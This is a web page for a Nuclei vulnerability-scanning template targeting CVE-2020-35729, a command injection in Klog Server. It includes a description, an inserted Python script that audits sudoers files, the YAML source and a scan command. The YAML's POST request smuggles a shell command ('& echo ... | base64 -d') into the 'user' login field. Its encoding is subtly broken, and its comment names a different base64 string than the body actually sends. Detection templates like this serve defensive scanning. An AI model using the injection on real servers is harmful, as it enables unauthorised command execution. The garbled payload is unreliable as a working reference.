Klog Server <=2.41 - Unauthenticated Command Injection
ID: CVE-2020-35729
Severity: critical
Author: dwisiswant0
Tags: cve,cve2020,klog,rce,klogserver
Description
Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The authenticate.php file uses the user HTTP POST parameter in a call to the shell_exec() PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.
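The description notes that the sudo configuration lets the Apache user run any command as root without a password, which is what turns the injection into root-level execution. The following is an added example (not part of the template or of Klog Server) that audits sudoers text for that condition; the account names in WEB_USERS and the sample sudoers content are assumptions constructed for illustration.

```python
import re

# Assumed web-server account names; adjust to the host being audited.
WEB_USERS = {"apache", "www-data", "httpd", "nginx"}

# Constructed sample, not taken from a real Klog Server host.
SAMPLE = """\
Defaults env_reset
User_Alias WEBSVC = apache, nginx
root    ALL=(ALL) ALL
apache  ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
WEBSVC  ALL=(root) NOPASSWD: /usr/sbin/apachectl graceful, \\
        PASSWD: /usr/bin/less
"""

def audit_sudoers(text, web_users=WEB_USERS):
    """Return sorted (user, runas, command) tuples a web account may run without a password."""
    aliases, findings = {}, set()
    for line in text.replace("\\\n", " ").splitlines():  # join continuations
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        head, _, rest = line.partition("=")
        if head.startswith("User_Alias"):
            aliases[head.split()[1]] = {u.strip() for u in rest.split(",")}
            continue
        if re.match(r"\w+_Alias\b", head) or len(head.split()) != 2:
            continue  # other alias types and unparsed forms are out of scope
        who = head.split()[0]
        users = aliases.get(who, {who}) & set(web_users)
        runas, nopasswd = "root", False  # sudo defaults: run as root, password required
        # Runas and tags carry over to later commands in the same list.
        for spec in re.split(r",(?![^()]*\))", rest):
            spec = spec.strip()
            if m := re.match(r"\(([^)]*)\)\s*", spec):
                runas, spec = m.group(1), spec[m.end():]
            while t := re.match(r"([A-Z_]+):\s*", spec):
                nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(t.group(1), nopasswd)
                spec = spec[t.end():]
            if nopasswd:
                findings.update((u, runas, spec) for u in users)
    return sorted(findings)

if __name__ == "__main__":
    for user, runas, cmd in audit_sudoers(SAMPLE):
        risk = "CRITICAL" if cmd == "ALL" else "review"
        print(f"{risk}: {user} may run '{cmd}' as {runas} without a password")
```

Lines starting with # (including #include and #includedir directives) are skipped, so pass each file under /etc/sudoers.d to the function separately.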
YAML Source
id: CVE-2020-35729

info:
  name: Klog Server <=2.41 - Unauthenticated Command Injection
  author: dwisiswant0
  severity: critical
  description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.
  impact: |
    An attacker can execute arbitrary commands on the server, leading to remote code execution and potential compromise of the system.
  remediation: |
    Upgrade to a patched version of Klog Server (>=2.42) or apply the vendor-supplied patch.
  reference:
    - https://docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35729
    - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/Exploit_Code
    - https://github.com/mustgundogdu/Research/blob/main/KLOG_SERVER/README.md
    - https://github.com/Z0fhack/Goby_POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-35729
    cwe-id: CWE-78
    epss-score: 0.95163
    epss-percentile: 0.99327
    cpe: cpe:2.3:a:klogserver:klog_server:2.4.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: klogserver
    product: klog_server
  tags: cve,cve2020,klog,rce,klogserver

variables:
  dummy: "{{to_lower(rand_text_alpha(5))}}"

http:
  - method: POST
    path:
      - "{{BaseURL}}/actions/authenticate.php"

    body: 'user={{dummy}}%20%26%20echo%20%cG9jLXRlc3Rpbmc%3D%22%20%7C%20base64%20-d%20%26%20echo%22&pswd={{dummy}}' # Payload: & echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d & echo"

    matchers:
      - type: word
        words:
          - "poc-testing" # from Base64 decoding payload
# digest: 4a0a004730450220317306436d9598cd6e2341b9d74072ee4a5e549ec39b8bfbf3af765de148fa910221008fdc46297e1396444770ad0efc20e7e2eb602b7285fc636143a7aad83a656485:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-35729.yaml"